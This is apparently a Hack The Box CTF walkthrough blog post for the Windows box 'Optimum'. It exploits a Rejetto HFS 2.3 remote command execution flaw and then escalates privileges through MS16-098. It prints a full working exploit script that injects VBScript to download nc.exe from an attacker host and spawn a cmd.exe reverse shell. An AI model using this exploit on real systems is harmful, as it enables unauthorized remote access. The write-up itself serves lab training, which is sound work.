CTF Walkthroughs, Hack The Box

Hack The Box – Optimum Walkthrough

January 25, 2021 | by Stefano Lanaro | Leave a comment

Introduction

This was an easy Windows box that involved exploiting a remote command execution vulnerability in the Rejetto HTTP File Server web application to gain an initial foothold and exploiting an overflow vulnerability in a version of Windows 8.1 (MS16-098) to escalate to system.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -Pn to skip the host discovery phase, as some hosts will not respond to ping requests

Enumerating Port HTTP

When navigating to the web server, it seems to be using HTTP Fileserver 2.3

HTTP File Server is used to send and receive files through a web application. Using searchsploit to look for known exploits in this version of HTTP File Server:

Exploiting Remote Command Execution in HFS 2.3

After trying a few of the exploits available, finally found 39161.py which worked. This vulnerability allows to execute arbitrary commands when performing a search.

The script requires a Netcat binary to be hosted on a web server on port 80, it will create a script that connects to the webserver and downloads it (script_create function), run the script (execute_script
function) and connect to a reverse shell using Netcat.

import urllib2
import sys

try:
	def script_create():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

	def execute_script():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

	def nc_run():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

	ip_addr = "192.168.44.128" #local IP address
	local_port = "443" # Local Port number
	vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
	save= "save|" + vbs
	vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
	exe= "exec|"+vbs2
	vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
	exe1= "exec|"+vbs3
	script_create()
	execute_script()
	nc_run()
except:
	print """[.]Something went wrong..!
	Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
	Don't forgot to change the Local IP address and Port number on the script"""

Copying Netcat binary to the current directory

Setting up a Python web server to host the Netcat executable

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

When executing the script providing the IP address of the victim host, a reverse shell is granted:

Privilege Escalation

Using the systeminfo windows command to gather information about the Operating System and build/kernel.

Saving the output of the command to a text file to perform enumeration:

Running Windows Exploit Suggester to find known vulnerabilities:

Found a valid exploit for MS16-098 which exploits an integer overflow affecting the ‘RGNOBJ’ variable:

Exploit DB link: https://www.exploit-db.com/exploits/41020

Downloading the executable file from the link in the Exploit DB page

Transferring the binary to the victim host using the Certutil tool:

After executing the exploits, this grants SYSTEM level access to the box:

Conclusion

This was a really easy box, but still interesting nonetheless. I had come across the HTTP File Server web application in previous challenges so this wasn’t new to me but it was a good change to do some research on the privilege escalation vector and how this was exploited.

More information about this exploit can be found at this article.